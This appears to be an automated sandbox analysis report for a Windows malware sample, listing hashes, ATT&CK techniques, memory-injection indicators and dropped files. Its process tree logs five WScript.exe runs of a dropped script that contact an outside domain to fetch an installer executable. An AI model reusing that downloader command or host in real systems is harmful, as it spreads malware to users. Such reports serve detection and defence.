4e22b6b48ebfce7afaed9f68642d169b5310a81313f1a9ef8d0c9f51d12438e7

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
08-05-2024 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe
Size

184KB
MD5

25eb6c59739b45a7ca034f816aa30d2e
SHA1

7da03ef3a50fee7f263e411427e57353fd673f0a
SHA256

4e22b6b48ebfce7afaed9f68642d169b5310a81313f1a9ef8d0c9f51d12438e7
SHA512

6d4f2e4f6e7db4082b0ac2ac7f7352011537a7fa6823e03e06c67b5fe5c11d35c1939603437a9caec320e1c32aedd3ac17f405105624d76742f394e05838045d
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3c:/7BSH8zUB+nGESaaRvoB7FJNndnx

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2608	WScript.exe
8	2608	WScript.exe
10	2608	WScript.exe
12	2740	WScript.exe
13	2740	WScript.exe
16	1424	WScript.exe
17	1424	WScript.exe
19	2596	WScript.exe
20	2596	WScript.exe
22	1596	WScript.exe
23	1596	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2608	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2608	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2608	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2608	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2740	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2740	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2740	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2740	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	30
PID 2440 wrote to memory of 1424	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	32
PID 2440 wrote to memory of 1424	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	32
PID 2440 wrote to memory of 1424	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	32
PID 2440 wrote to memory of 1424	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	32
PID 2440 wrote to memory of 2596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	34
PID 2440 wrote to memory of 2596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	34
PID 2440 wrote to memory of 2596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	34
PID 2440 wrote to memory of 2596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	34
PID 2440 wrote to memory of 1596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	36
PID 2440 wrote to memory of 1596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	36
PID 2440 wrote to memory of 1596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	36
PID 2440 wrote to memory of 1596	2440	25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\25eb6c59739b45a7ca034f816aa30d2e_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD59.js" http://www.djapp.info/?domain=DdUuVVsmvr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufD59.exe
  2⤵
  - Blocklisted process makes network request
  PID:2608
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD59.js" http://www.djapp.info/?domain=DdUuVVsmvr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufD59.exe
  2⤵
  - Blocklisted process makes network request
  PID:2740
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD59.js" http://www.djapp.info/?domain=DdUuVVsmvr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufD59.exe
  2⤵
  - Blocklisted process makes network request
  PID:1424
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD59.js" http://www.djapp.info/?domain=DdUuVVsmvr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufD59.exe
  2⤵
  - Blocklisted process makes network request
  PID:2596
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD59.js" http://www.djapp.info/?domain=DdUuVVsmvr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufD59.exe
  2⤵
  - Blocklisted process makes network request
  PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
098e3fff2705346ece787c21ac03d0f3

SHA1
8f6923a4871978ebb148a5f1cd34530887b0f0e7

SHA256
16ed7a2c43f928bcc7ec8f7e93082abda7106a63b87e747dcca57f1cee05ccc9

SHA512
2977d9e735e742cdef931554063ce606e3ea9ef4bbf5f405bda639cca10444d0882bc5f48067e5b0e847af7ba069a2fbd97f386937fd3b19b5444d208d962e7e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
34ca33014b1b55459cceb020b77f35b5

SHA1
8def3e4d4ca95e5c005bd8e240f2807384e03b3b

SHA256
e80cdbae421a86333fa72bd8fbbc99edf923ebf06f9ba77853aed5c6ee2f8706

SHA512
b680c141568f2f7203ad7c33fc4811d5a25a854afa2831009ab8eb0cb4a268b1ee844a9c0b3eabd599441c5bdb13ff78a44a7378b6c6e5beedae160bb86737d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7b96c92959bfc1d89e97beb6976373d8

SHA1
8c7457858a02d9cccdd823c88d6da222bf1e3638

SHA256
e67f608318cd6cd175c55c4933f7dc4e32ac1a9637c132c92f90a21e36fa2c6e

SHA512
a7a68bd841c4b08874c398caa7da9fd6e2f3b49ec41586cd9b1da9f63e240aa2ecda9e8adaf0288029a06a2f45e51da528a4ed7f19f8da2a8f144067068fd15b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
254f67c3a3614e8700aaab11ef5333dd

SHA1
8093aeb0c0d08af63f3a2ce2745289ec1a900c07

SHA256
8373d7d51f414f76e05691c20291a3f0fb61641243cfda07799a04a6ff62d7a5

SHA512
772cae5b4782b5295daa5c25adefa79293f3e87d16a27bc10ae3670b4c4978f1fcb04400098785399a1c847e23e73181fa66d8a102076e0944a52fa7528c7b77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
15a008da9c6bdc63b2a1315ebff45160

SHA1
d19a3ba82c286782ef917b54a48e16a1b32bf5cc

SHA256
478d86f59c4638b1c963c81bd088f06a5e9be5746a033b8a300980b05590ae24

SHA512
9333f065c0db6c9a31e1af0a95a92355d492a9b1faee72e55df43892df62e8e11872325fb04d8d148ed7ac2d554c0f13ad1eb97e9b9e6db6472a4c53b2624385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
894803c52b96dae1ecd2b1b1c0ea6535

SHA1
699a5fd99153652b68c9c5f8fdc009265da6600c

SHA256
380ea1a70d78cb69c3d3002f7f59b0f1dcfe49dd1841f14110c7bf45a2c8eee9

SHA512
bdfa3b032680dbaa594c8263ce0e8aea5182c639303fe677b29d253f2ff52f1d63c24223fec3fe77355fbd9293b94f86e6091be60fa7c7bfdb6669650f845bc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
b4c3af1f229bbb2609a308fcf3d8db2e

SHA1
4e089b95ed59f7764a280737256fd184e355e56a

SHA256
c5f76ed87359d8d9c227c2f4bf850ba0d970b762bb5c1ef1b2951f0b259638c3

SHA512
b4a8e18e09d26f294e14f218d624ab39ca4d0f94e5e0ae2992b359e5694a27ff833e00342672e6bb36df3e54bf6f313aaad0b28472acd8e2729b11b8d0acda3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
416672f105258e75c6c099265582b162

SHA1
4bcac9a8ff3acb52a9eb75b9a3f5d6265f9c6043

SHA256
a138f39855e370a7a3d9f4a874f80046c6b4fdba721e57f9122fb196c5b6f287

SHA512
e97b0028dea77409f09a6b27756b95ae7540bd734077fb0e4bae2591092cb26235fe01876a62898dd30cbeef63b053c932784b0867a716bdbf97d637fa207276

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3CA3.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5513.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufD59.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WODOBSD6.txt

Filesize
177B

MD5
a2aef42d0a1c611748bb679e27f900e8

SHA1
13543c6afe6ac9732e9bb90deedc1b3cebb2700b

SHA256
7b7cfe6bcecc2cf45117ecf179f3c32dcb70c0ff20a4cb65b4669ce568974ef5

SHA512
a64d6f0c5679ef2c12ca1539c1970dd4794580b2192563131f258decafc2d8d8027077818cd66f980a023f431c55ed0d970523f480f6bfd97be10cc230903e41

Download Submit